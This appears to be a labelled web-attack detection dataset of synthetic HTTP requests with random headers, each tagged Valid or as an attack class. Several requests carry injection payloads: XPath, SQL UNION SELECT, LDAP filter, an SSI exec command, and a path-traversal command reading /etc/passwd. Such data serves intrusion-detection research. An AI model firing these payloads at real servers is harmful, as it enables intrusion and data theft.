UA-Disp: 179,7168,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 669x1617
Via: FTP/8.1 www.eoMO.gif
Transfer-Encoding: gzip
Upgrade: ioeroj/6.7, urpa/3.7, tthp/8.6
Warning: 310 www.tuatshe.jpg:92418 "aTmit2nDei" "Sun, 14 Mar 10 19:02:00 UTC"
X-Forwarded-For: 202.225.233.245
X-Serial-Number: 27066605
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ek=lLd8A2esEj0D&da=5&wis=)era7i~r>6&0p=2cllasosxda&qettotj=tCyRRsGTk.K9&TqMfsxiRUSB=76&darwtopNecns=ggKkGhbP25A&thkVnSiaehzk=hIQr6&Gh5Kfwget=Lfonlaln&OQ4Eo=cvitn&EScaensi4d=1982956&rul1t5o3scim=f7s

End - Id: 7794
Start - Id: 35789
class: XPathInjection
GET /447Xbmetaj3Ds/hzfP2XRbt/saeU/aeNhaisreqlao7AzEb/qrlw/i3URg5sUm8It5Qb6/ymDSf11F5O_.jpeg?orm=t1f1KhZSQh5G&nTolqvw15hlts=eoEmrdB%27+++or++6++++%3C+++++count%28path%2Fchild%3A%3A*%29+++++or+++%27sdEmsaw%27%3D+++%27&hea7=wnhvsmc&u5ep=tefrom&aednCsqi5Tn=5&neukoeihienv1R=adminnrnnc&hheteEtieh1osc=750&vifhodIi=Lvrtiia3opentrN&wJvuVacceptphpeQ=deletet%3Ar%3Ab&dfeon=e7xNG9Aoj&enadkn3hst=%27+nhe HTTP/1.0
Host: 50.87.16.180
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-cyrillic, x-mac-hebrew;q=0.7
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.9
Cache-Control: no-transform
Cookie: REbo=h=;ood=drop6$eq;1inputu3j1n=openn
Cookie2: $Version="1"
Date: Thu, 10 May 07 03:13:18 GMT
ETag: "vy@i_rJBzSWPindrb"
Expect: 100-continue
If-Unmodified-Since: Sat, 04 Apr 09 13:48:47 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 04 Jun 06 17:12:12 CET
Max-Forwards: 522
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="slah"
Authorization: Basic aWtvY2V5bmE6Z3JpcjZveg==
Referer: /oaretjis/ahonenp.msf
Trailer: Expect
User-Agent: Adfesfkhmesihx9lw
Via: FTP/8.7 www.aiOieu.tiff:61, HTTP/5.7 www.tRiNfce.shtml, 0.3 49.102.105.83:30088
Upgrade: lse7/5.0, eaI/8.5
Warning: 396 72.31.252.105:54837 "8rfz" "Tue, 15 Dec 09 08:04:48 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35789
Start - Id: 906
class: Valid
GET /syZyNQ/uZWZwS0mHI11NA00P/oTwXKY/iM/y62nZw7y9tjBo6NjUE@/mPyBu7oNwnIvil.ucOcE/bEwatrrthtogecweegU.jpeg?thFVwR=143351&EfopKg=oikcdHdwttwmle2lyt&re3o=emn%3Cyeliacceptcrepi&tdthu=746251&De2u9e=2&te7nta9cote=aCds1&lie5ptE=jt2opte&Ehwerit=5i HTTP/1.0
Host: 16.234.174.80:6
Connection: close
Accept: audio/*, audio/*, image/*;q=0.4
Accept-Charset: iso-8859-2
Accept-Encoding: *
Accept-Language: nnezs-u;q=0.0
Cache-Control: no-store
Client-ip: 189.77.5.237
Cookie: OI7Am=in-)e%te@s/tWe;9RIcopynyo=utraaiaee;nhit1dsoedge=45;rmtiuskit=-B 6usttbenri;tpemiaer=1866
Cookie2: $Version="22"
Date: Fri, 03 Jun 05 20:02:40 GMT
ETag: "33HcNbBNC1HdtlHTdYe"
Expect: 100-continue
From: njNas@wal1m.uk
If-Modified-Since: Sun, 27 Mar 05 07:23:02 GMT
If-Unmodified-Since: Thu, 28 Aug 08 11:49:41 GMT
If-Match: "w-gfeWDHIeCUWPU"
If-None-Match: "WduQN2dggID8xoot"
If-Range: Mon, 02 Jun 08 10:29:54 GMT
Max-Forwards: 6
MIME-Version: 3.0
Pragma: ri039hnc='or6anerm'
Proxy-Authorization: Digest uri=http://apeo.fr/nenaohpr/utnBni/Eeor/utbwemst.dll
Authorization: Digest nc=1e3Dd4Eb
Range: 6-,8198-40078
Referer: /zkoefsfu/99kbS/mmccAW/ltas.cfm
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/7.2 (Windows; U; Windows NT 2.5; ia-te; rv:6.7.1) Gecko/30954243
UA-CPU: x86
UA-Disp: 1003,145,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1573x8135
Via: FTP/4.5 www.ototz.tiff, 5.3 www.aieIeeer.png
Transfer-Encoding: n1aN; g18tedei=ntnba
Upgrade: iehx1/0.3, ohanrn/8.7, 0ph/6.5, RaOe/2.8
Warning: 603 240.95.248.64 "moWglFxicahg4rn" 
X-Forwarded-For: 145.115.206.7
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 906
Start - Id: 43572
class: OsCommanding
GET /ten2Ehmf7noyCB7gCd/nSAyXuFnRNzciI/popftctkst/oEtaeesttyCnd/einlscRtbf/EAaywiynyhi/a3TcDt_ycx8Ch1WtsiE/ect5feseeN0sgh.css?rtestusthquBss=+es&1f27=%7Ccat+++..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd++++%7C HTTP/1.0
Host: www.ii2osx.net:0
Connection: keep-alive
Accept: text/xml, video/quicktime
Accept-Charset: x-mac-turkish;q=0.4, iso-8859-6;q=0.1, windows-1257;q=0.3
Accept-Encoding: 
Accept-Language: orI-src;q=0.0, I9C-ylaesct;q=0.8, 0i-hsfs, us5r-age9loa;q=0.6, Li-et
Cache-Control: only-if-cached
Client-ip: 70.59.213.33
Cookie: eskomttweuhI=uC4BsjW;pezuretB0=rAs httpshg6  PslrbQ%
Cookie2: $Version="361"
Date: Mon, 05 Apr 10 21:07:55 CET
ETag: W/"2Mpn4nO2vwMkkK-Rd"
Expect: nhNcolo
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Sat, 10 Jun 06 21:14:32 CET
If-Unmodified-Since: Wed, 19 May 04 24:54:02 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Jun 09 08:07:19 CET
Max-Forwards: 040
MIME-Version: 5.9
Pragma: no-cache
Authorization: Digest realm
Referer: /ydybk.mpeg
TE: trailers
Trailer: Host
User-Agent: Mozilla/2.5 (Machintosh; U; Mac OS X 6.2; sI-yh; rv:7.4.3) Gecko/94328221
UA-Pixels: 569x2891
Via: 1.7 www.jmiteo7h.css, 2.4 116.251.164.25, HTTP/5.7 www.otsPhir.htm:059
Transfer-Encoding: compress

null

End - Id: 43572
Start - Id: 34345
class: Valid
PUT /1Qjvarhwe@D6Tx/kL_KZOk.r7RJUY_spiH/uTreiazssequmauoi.asmx? HTTP/1.0
Content-Length: 142
Content-Language: mhsHcp
Content-Encoding: identity
Content-Location: http://iiifd.org/gfOho2/aPlD/3ezyr03/io2eRlbh/saeat.tiff
Content-MD5: YTZGbnJBZEE4cUFiZW4yeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Jul 07 14:55:24 CET
Last-Modified: Sun, 30 Dec 07 07:43:13 GMT
Host: 72.86.5.176:80
Connection: close
Accept: image/*;q=0.7
Accept-Charset: x-mac-arabic, x-mac-korean;q=0.2
Accept-Encoding: compress;q=0.7, identity
Accept-Language: *
Cache-Control: max-age=31
Client-ip: 165.247.4.121
Cookie: o7oieenst7nf=mbinclude
Cookie2: $Version="16"
Date: Tue, 06 Dec 05 20:18:44 UTC
ETag: "Jhi0.WHrMahIITB"
Expect: vrCnoab8
From: ssmwtfe1@ksfro.ch
If-Modified-Since: Tue, 19 Jun 07 17:52:54 UTC
If-Unmodified-Since: Tue, 25 Nov 08 22:09:06 CET
If-Match: *
If-None-Match: "APdnVUyU3v2TO7Yuoe"
If-Range: "PuczPPWsD6DUy39nf"
Max-Forwards: 1896
MIME-Version: 3.9
Pragma: co=piSoh
Proxy-Authorization: NTLM bXBvZG9yZVNvY2FqSG9tc3JsNWVpaWl2U3NyZmlyaGx0dG5ha3l3RQ==
Authorization: NTLM Zml0ZW9Fb2lUZ3N0Uzl0cG9kanJobjhtdmdubFhvb1J0dTR6NHRldGhpamZ0bw==
Range: 466406-,34086-,7249-
Referer: http://www.HetluuaE.org/bYslnjdn/srertnnu.msf
TE: trailers,trailers
Trailer: Connection
User-Agent: 4ArrGW http://www.i5pa.com
UA-CPU: Sparc
UA-Disp: 3186,9762,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 9714x0556
Via: 9.9 105.47.216.123
Transfer-Encoding: gzip
Upgrade: rdr/6.4, 3nxf/4.2, 62a3t/9.7, gmOIe/2.2, sz3/4.6
Warning: 293 www.rtrRiite.jpeg "jjzdARr7habhta13" "Sun, 15 Jun 08 16:27:29 UTC"
X-Forwarded-For: 143.200.9.7
X-Serial-Number: 418428957866
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

dwzaalAseui=h.u&usdttpp=ie:xnbsns7p&arrfsq47ocibta=<to&aktsjhz2uaIi4=hr)xnetcat&iy7tannecew=938&akf=eb\eo&6i=6&aTaV7i=ij'aed4enoakte

End - Id: 34345
Start - Id: 22033
class: Valid
GET /lM@Vexscript/m5Y2e.f27Kq/eCL6Db1k/c@fdEkrzYtX/sL_jJJeWiJ5zKWycCH/iEkBhpHnZM7.6wEC/ghavingtIJ/soetIezejferrtnC1t.tiff?etxieawy=15272932&a7epi=drtmwsn&e49cpgN=t96seoetolsu&nsti=81346629&fbnitti2En=sMy3e&meia=yenceTeNak9e&ceglsa5pagl4w=ne&atheshNot1n=n68LV7-qj5tD&LOo=+8xtia+hvardXgsock_streams&ei7nsg9crLeoaea=xRwieiehio&t5hD=19006614&eEonghc=owirvfy2l HTTP/1.0
Host: www.wredT.cz:8
Connection: Dnnyetez
Accept: application/rtf;q=0.4, audio/x-wav;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: css-bc;q=0.8, wrs06-a, osx-ehw, nod3s-8t, jNrsBedE-bk9ldtn;q=0.4
Cache-Control: max-stale
Client-ip: 254.122.123.9
Cookie: ya8tolbwe9iA=228989;t9Xsbp=c5ctneiEsShfgxhj;4oRreoir=tmeeqowieawhe0Mh;Qnull-I435hwp-Mf=925383399
Cookie2: $Version="57"
Date: Thu, 20 Oct 05 16:19:48 GMT
ETag: "OjbW9x0lMmWzDJ2U"
Expect: tou5ioc6=ibdt
From: rnoHSnss@agsartc.de
If-Modified-Since: Mon, 19 Dec 05 16:45:44 UTC
If-Unmodified-Since: Sun, 26 Aug 07 24:09:59 CET
If-Match: *
If-None-Match: "mLgGtNnxlgXrz4midU-"
If-Range: Thu, 28 Feb 08 09:34:03 CET
Max-Forwards: 1
MIME-Version: 1.6
Pragma: fun='tdsc'
Proxy-Authorization: NTLM Um9zRndCZXRPaXl1MEU0c3RFY2xlcmRlM3JlZmdybnI=
Authorization: iEad 2aUnen=treorwde
Range: 5-448267
Referer: http://www.ugumprf.biz/rtEcee/r0o1b/ibeqeu/1dtuw/hdosZe.mdb
TE: trailers,trailers
Trailer: If-Match
User-Agent: en8mwClw31Yb2mm
UA-CPU: MIPS
UA-Disp: 077,354,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7963x8460
Via: 3.8 www.e0r7L0.shtml:6, 6.1 188.44.164.155, 3.2 www.rgoeex.css:7
Transfer-Encoding: deflate
Upgrade: p9tI/9.2, 8r9o/6.5, aeyn/9.3
Warning: 103 www.Krm9fhll.htm "rrsU3rWt9etr" 
X-Forwarded-For: 154.57.178.151
X-Serial-Number: 10148622161169
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22033
Start - Id: 30482
class: Valid
GET /ta/othAoTBtOsangjgcCa/drEaCrI/aeUoudcxesteiwIusQ/6VGYhTD6ZLr0/mr.3GTDOk-k8W.cgi? HTTP/1.0
Host: 157.145.190.90
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-japanese, euc-cn;q=0.9
Accept-Encoding: compress, deflate;q=0.2, identity, gzip;q=0.1
Accept-Language: ltot-lj, uyoo-fdbm;q=0.2, iKu-uoe0
Cache-Control: max-stale=32448
Client-ip: 14.178.222.69
Cookie: iddseslNtwggnno=h(ebinr)toWtsc];Hl0olcmdXy=gao0e0o;pmeH=n2-6N7ZzGNIx;tpSmiuny=ew;jinjbrr0Jew1ii=se3cset 2sntmpry
Cookie2: $Version="618"
Date: Thu, 10 Nov 05 16:21:28 GMT
ETag: "CB2MpYnZ88UJv_WHNVOr"
Expect: hrohisy=emeNs;mSnIm9=h1Ty
From: l8ngh@nEai2iouaS.be
If-Modified-Since: Sun, 29 Apr 07 10:21:35 UTC
If-Unmodified-Since: Fri, 14 Nov 08 05:20:36 GMT
If-Match: "0@ah5cynKL.jXeYIUEfI"
If-None-Match: "9Vx2HCga@vUCDndr"
If-Range: Thu, 10 Jun 04 09:43:32 CET
Max-Forwards: 4224
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic bWVkbDp0N21t
Authorization: Digest opaque="lwhns"
Range: 32-29,033002-861540
Referer: /c26k/nCtcsatr.gz
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.9 (Machintosh; U; PPC 2.0; se-dp; rv:3.0.5) Gecko/76567229
UA-CPU: x86
UA-Disp: 264,406,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 710x3564
Via: FTP/0.2 www.tiaoew.html, FTP/8.3 153.41.92.9, nabno/8.4 www.gqp5eI.htm
Transfer-Encoding: compress
Upgrade: tsn/6.7
Warning: 817 212.234.225.102 "oabwt3sj6anocoi" "Sat, 09 Dec 06 19:18:18 GMT"
X-Forwarded-For: 205.107.245.45
X-Serial-Number: 9887656877315806
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30482
Start - Id: 36881
class: LdapInjection
GET /lkd-Qwa2a/HYbAHOCJo5PzoX0/gvsAcedrs.gif?az0teWtgaaDsmus=sst&OornBn=erZ&H4saiereohjt=tfe&dtecpnN=069885&lBJx5z=8reots&t97aOnPGz4=o6dWelalI88ts HTTP/1.0
Host: 208.189.131.90
Connection: etnb0o
Accept: */*;q=0.8
Accept-Charset: iso-8859-8;q=0.5, windows-874;q=0.7, cp-936
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 184.146.10.196
Cookie: aN5tnsoiIlt82=nr)(&(objectClass    = ozs*);ydogyoHct3sio0h=sjaV9obC7
Cookie2: $Version="0"
Date: Sun, 17 Apr 05 17:37:30 GMT
ETag: W/"dDLizBI..UHzSbH9891"
Expect: 100-continue
From: hlie@ettef.de
If-Modified-Since: Sat, 03 May 08 19:00:22 UTC
If-Unmodified-Since: Tue, 28 Mar 06 02:31:15 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 79
MIME-Version: 1.2
Pragma: srOc=aigi
Proxy-Authorization: tittt SszhsJl=itA3crq
Authorization: Basic cmFuZWVUOmVtaXdo
Range: -348635
Referer: http://www.9sqtoEh7.fr/os1w1aeg.fgf
TE: trailers
Trailer: Cache-Control
User-Agent: toesitrIsoeiFtNloez
UA-CPU: PowerPC
UA-Disp: 1108,5014,32
UA-OS: Win9x
UA-Pixels: 5144x8238
Via: 4.4 www.ywT5.tiff, 3.7 www.laaiOir.gif
Transfer-Encoding: deflate
Upgrade: nrT/9.9
Warning: 328 71.142.30.136:77389 "ttnaaextoqsiIoo" "Fri, 15 May 09 15:18:30 CET"
X-Serial-Number: 0500322312
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36881
Start - Id: 21981
class: Valid
GET /ogrredireirisadeuiie/snt4naoasenoeouscu/15nncbgbfcing8/swehwaa0mi8the.css?group by5Wrw=lI0&GXMav@d=idmoyvgoemelu%3C%3Aroadmin6&Cref=412&nnhftopurw=53283&inoonsTAolia0nc=tUN0&mp=5T%3AnjvarRInm+&ehciiht5seYesc=%7E+fe%5Cowsamoodo%2Bip&ydmo2mcMe=6iciv&5x=thomepf+isOha%28tireaa&grtaEinl=likepestrEdropdu&GwIW=a%40wbR.IZWe&SgLeSvM.Qq_L=970&Fsi=912268&ogba=t- HTTP/1.1
Host: 222.195.83.96:80
Connection: nfdmc
Accept: video/*
Accept-Charset: iso-8859-8-i;q=0.0, iso-8859-6;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 114.150.253.168
Cookie: w.C8XF7cZNN=e;Yaei=eOincludeoeet6moj5
Cookie2: $Version="698"
Date: Sat, 17 Apr 04 19:19:44 CET
ETag: W/"w8_ObORHhZaf2C@l8y3"
Expect: s9aD
From: hso9@seTndeScl.it
If-Modified-Since: Thu, 27 Oct 05 22:33:23 GMT
If-Unmodified-Since: Fri, 13 Nov 09 15:20:06 GMT
If-Match: *
If-None-Match: "LK0gvAbcOSw4mIDzT@lc"
If-Range: "D6z3_tFXc8z_ORK9Xt"
Max-Forwards: 11
MIME-Version: 4.9
Pragma: gOTy='odt'
Proxy-Authorization: Basic Y3VkUzpocm5n
Authorization: Digest qop=auth-int
Range: 2-874,8-,3113-623962
Referer: /0szioss/nent/inis/tdsQ.pl
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/0.4 (compatible; MSIE 9.8; Linux i386; st5i)
UA-CPU: MIPS
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 0095x515
Via: FTP/1.5 www.1heta.css, 1.9 116.113.3.65
Transfer-Encoding: deflate
Upgrade: fysst/0.3
Warning: 225 83.153.240.145 "z2mns9" "Wed, 03 Nov 04 24:19:07 UTC"
X-Forwarded-For: 3.21.36.129
X-Serial-Number: 920022590702
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21981
Start - Id: 30228
class: Valid
GET /2Sba/hI/j_o/hL0A49ui4MnW-IF1bwz/wgeth/ye0ASRlikenodeAlZLqM/rPZws5W.FvVL/ByREXCY0wesR/irQ/rzsdpz/rDzva4Svwt-dlD727lik/fth.php3?iril7Btvdie4hJ=k9Ehnlg&nlne=tESh%26&fEe3y1e7Jsock_streamE=5&syattatsne=auuti&wp-N0t5E=zet&14fgz0tqad2=uzoWO&hsLtehduottagce=nrJWZx.mOgR&qgmpcI=nmi&a16tete=bltsal HTTP/1.1
Host: 189.187.29.167
Connection: close
Accept: application/*, application/*;q=0.5
Accept-Charset: x-mac-turkish, iso-8859-8, x-mac-icelandic;q=0.4, iso-8859-1, windows-1258;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=72
Client-ip: 43.104.83.62
Cookie: tiljnsysbfoo=IaoptS8i2ioOdmocha; ;chttps;utHaerttea=5143;Hnon=ner asiframesi\phpb(  antj;r@7cAor=rcM.RA
Cookie2: $Version="0"
Date: Wed, 15 Jun 05 06:14:40 UTC
ETag: W/"qZR5zHuy_j.jpzx"
Expect: 100-continue
From: OtuSewg@hqerotci.biz
If-Modified-Since: Wed, 11 Jan 06 09:19:08 CET
If-Unmodified-Since: Fri, 10 Apr 09 03:09:54 GMT
If-Match: "QKlCEZfF874wmitrk"
If-None-Match: "1Lj5ksXoo4lMo_ifA"
If-Range: *
Max-Forwards: 17
MIME-Version: 2.9
Pragma: po=aalhh
Proxy-Authorization: cauv rfTcyhia=lorfye
Authorization: NTLM b3Rucm9pTkV4em5PN1Y2aXN0Nm5xbWNuMW5ldGZoMWdrdGE=
Range: 346642-698,469-394,8-
Referer: /edfhEek/kprl.avi
TE: chunked,deflate,chunked
Trailer: Date
User-Agent: Mozilla/5.2 (Windows; U; Win 9x 9.4; 2e-f4; rv:6.4.8) Gecko/64928625
UA-CPU: Sparc
UA-Disp: 058,5611,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2607x1931
Via: FTP/6.2 www.raoauzL.jpeg
Transfer-Encoding: identity
Upgrade: rtW2/3.4, ohothc/2.6, cDbs/6.4, Evs/7.7
Warning: 579 185.81.167.241 "3i0d" "Wed, 17 Jan 07 24:46:17 CET"
X-Forwarded-For: 172.159.37.56
X-Serial-Number: 19194011026
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30228
Start - Id: 11697
class: Valid
GET /upaTFq/crrosentsstktet.dll?tuau=a0JKc6e.&wehnlrbh=dee1td&ehnEeesm=sPpr&xooo0she=00838249&HSoKmTeXKT=Qo%28pteetginput&oaitvsthsi=l6wd0RiLc&aqzsswLhylhede=384&hNarhieoRivc1u5=+fuclbl%28u&leeas9oaIeafnee=taIdshutdown&2esuawtr=66086328&eitaenRactaryo=7322 HTTP/1.1
Host: 205.60.244.161
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.4, compress
Accept-Language: dfiuNnte-tdbs;q=0.0, au-ia;q=0.1
Cache-Control: no-store
Client-ip: 228.241.203.171
Cookie: LtA=ewesgikz9iael;qOx6=11006286;r3iwettisT=t3i6n%p/hoVn;cue3sotUeceoku=27;Og1ehw=250
Cookie2: $Version="29"
Date: Sun, 21 Mar 10 09:36:01 CET
ETag: W/"vlPTD9@nIM@0fyK2eaZ1"
Expect: 100-continue
From: sirxnDi@0oociO.fr
If-Modified-Since: Mon, 08 Nov 04 15:13:13 UTC
If-Unmodified-Since: Sat, 25 Jul 09 17:37:24 UTC
If-Match: "9cvzeDGGrGUqkmy"
If-None-Match: *
If-Range: "zVYVyFyyTIA_RKHobiq"
Max-Forwards: 1529
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="ciapc"
Authorization: Basic aGFzbzpkdHBy
Range: 345-226
Referer: http://www.lHeen.biz/33tFrcH/6ix6s2dl/AaaEs7/rsehta/4etEtynf.sh
TE: trailers,chunked,trailers
Trailer: TE
User-Agent: o0UdoepP (bekK_o9A5; i.m4uamoe)
UA-CPU: 68000
UA-Disp: 940,7536,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 9315x6291
Via: FTP/3.4 www.midfdedr.html, HTTP/5.4 www.emhem1ag.gif, 5.6 91.201.182.85
Transfer-Encoding: deflate
Upgrade: tmr/0.7, qae/7.6, nere/3.3, tuievn/5.5
Warning: 413 www.nrtr4.htm "0pki8Efph5ybOudthtc" 
X-Forwarded-For: 129.43.76.8
X-Serial-Number: 2344723441
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11697
Start - Id: 40039
class: SSI
GET /hbnsNeta3mnaig/Ia/eEw/7j/Iinput8Kq9SE9.tiff?fle=le2f8QljD&spifah=9izs3a&SbhQc=%3C%21--%23exec+++cmd%3D%22%2Fbin%2Fls++-l+++%2Fhome%2F7tsceisn2%2Fqluo6u%22+--%3E HTTP/1.0
Host: 247.148.111.49
Connection: close
Accept: image/*;q=0.1, video/*
Accept-Charset: utf-8;q=0.2, ks_c_5601-1987, ks_c_5601-1987;q=0.1, iso-10646-ucs-2, us-ascii;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 160.214.20.200
Cookie: eweecmn5=hLXWoeKlnlSes5tnaE;ppnnbOfrom=sXIAKy27;4aTYJO=wl_o2;sautst=085943;SUbgnotw=r3c9i9aai7l
Cookie2: $Version="25"
Date: Tue, 03 Mar 09 22:06:01 CET
ETag: "1oi95JajISSvSc6NmwV"
Expect: 100-continue
From: loaa@ioendeSshb.it
If-Modified-Since: Wed, 23 Apr 08 01:08:06 CET
If-Unmodified-Since: Thu, 25 Oct 07 19:23:18 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 402
MIME-Version: 5.8
Pragma: botele3y='v'
Proxy-Authorization: Digest username="tsbedo"
Authorization: Digest realm
Range: 04250-19296
Referer: http://LTtemno.st/qtsn/bOd66i.php4
TE: trailers
Trailer: If-Range
User-Agent: brrbtsmclm (i6TwNJD06; rZYppXwoSd)
UA-CPU: MIPS
UA-Disp: 704,609,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 1.1 www.ahd42b.css, BIhte/0.9 76.80.83.86:72, HTTP/1.3 www.qiet.tiff
Transfer-Encoding: oretoe
Upgrade: sonW0n/7.4, iecird/0.5, sihan/2.9
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 36197
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40039
Start - Id: 42288
class: SqlInjection
GET /oA/Sn4aAS3tt5utar3oe/svY/ecsdsaeaptcti7za/eweemelnlgnr8hrna/ilV-KTZ3iXSZaky/0yha9YEPVlVPFGrM/ncPrsipdj/nek0yoxun8umru/5gNb0qrSngqaSsaA6el/uY/e6IsroihaSsm1p.tiff?Mn6l=Fe&wUBZWPreplace5=q&lstdinNt=%27++++%29++UNION++++ALL++++SELECT+++++1%2C8455%2C1%2C63%2C0+FROM+++ar+++++WHERE+++%28++++%27%27++++%3D++++%27&fatet5ent6=txrtr&owaoniiooatslt=6057914536 HTTP/1.1
Host: 104.215.164.228:2003
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate, identity, gzip;q=0.6, gzip;q=0.8
Accept-Language: *
Cache-Control: min-fresh=956
Client-ip: 94.165.178.34
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="134"
Date: Tue, 24 May 05 18:29:35 GMT
ETag: W/"17F1n2q6q2So7mxf"
Expect: 100-continue
From: 8eae@aimsslc7.net
If-Modified-Since: Wed, 06 Sep 06 07:17:40 GMT
If-Unmodified-Since: Sun, 19 Sep 04 23:54:16 GMT
If-Match: "QheidUdAsABZIoL8"
If-None-Match: "BD2RRbqcrCQ62-LwP@"
If-Range: "6kNai0wxdgBmfbZ"
Max-Forwards: 2
MIME-Version: 2.3
Pragma: eisd=eehom
Proxy-Authorization: NTLM c2NTYTJ1bDV3emVlZXlUZWV0ZHJhZXR5ZHJiN2dlaWNvY2ZTaWhlZW9ybWNq
Authorization: tusE HcFen=tbiuae
Range: -568889,-588214
Referer: http://www.oeertr.org/jDeeeari/lnEwyn/utfns/crllns.ace
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/0.7 (compatible; MSIE 3.4; Win 9x; mios; dloepa)
UA-CPU: Sparc
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 443x7648
Via: 0.8 106.241.204.205, 9.8 132.18.132.93
Transfer-Encoding: identity
Upgrade: lr2rr/2.7, aetd/1.2, tei/7.3, tgOeft/0.3, Ozehbn/5.9
Warning: 767 136.91.228.117 "ogadceLeitGounodog" 
X-Forwarded-For: 41.19.144.81
X-Serial-Number: 0737501888973
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42288
Start - Id: 21302
class: Valid
GET /uMdrzHr.7xCvugQqoO6C/u0.FkU.bin? HTTP/1.0
Host: www.tnsodrl6.uk
Connection: keep-alive
Accept: audio/basic;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: 2tOv-hNauaal, o-lzhd;q=0.7, oeh-smoj;q=0.5
Cache-Control: u='seii7mt'
Client-ip: 130.22.25.249
Cookie: lriqssgd=unionQdl/ng 
Cookie2: $Version="793"
Date: Sun, 11 Jan 09 08:40:39 GMT
ETag: "TGlCpO2QRbtWoKg"
Expect: 100-continue
From: nsgt@tyrb.fr
If-Modified-Since: Wed, 18 Oct 06 20:26:18 GMT
If-Unmodified-Since: Mon, 12 Jul 04 14:49:05 GMT
If-Match: "mVb2xtgQ-h_pIWZEsdi"
If-None-Match: *
If-Range: Thu, 01 Jan 09 16:52:51 GMT
Max-Forwards: 7778
MIME-Version: 3.2
Pragma: t9d6oa=DdFtscu
Proxy-Authorization: NTLM T2VhbmFpbm05Y2hydW43d3BBZUpsZWNvYnIxN3JyTWZubmh5U2FlN0V0ZW94d3Q=
Authorization: dnmtt aieee4A=oegr
Range: 863-
Referer: http://mlanhtle.com/t9iaO/4ffhldw/ees5o.sh
TE: chunked;q=0.7,trailers,gzip;q=0.2
Trailer: Trailer
User-Agent: eZy72brm http://www.otjt.be
UA-CPU: PowerPC
UA-Disp: 698,349,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6998x4175
Via: 3.3 37.64.192.90
Transfer-Encoding: deflate
Upgrade: oSii/2.9, rhi/9.2, rNil/2.3, sIri5t/1.2, seoE7t/2.4
Warning: 220 20.74.85.15:047 "seLtmobona" 
X-Forwarded-For: 56.53.73.85
X-Serial-Number: 900444
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21302
Start - Id: 30365
class: Valid
GET /fAsock_streamXq_GvE/oej/tnbiS/ti/dtejl/b41@vLK/rwr/bNP6b.U1PP/gZcfmAl71EgzbSlp3Pg/iy/vDdMQCshutdown.php? HTTP/1.0
Host: 95.218.191.64
Connection: 4dyp8
Accept: image/*, image/jpeg, application/rtf
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 157.134.59.66
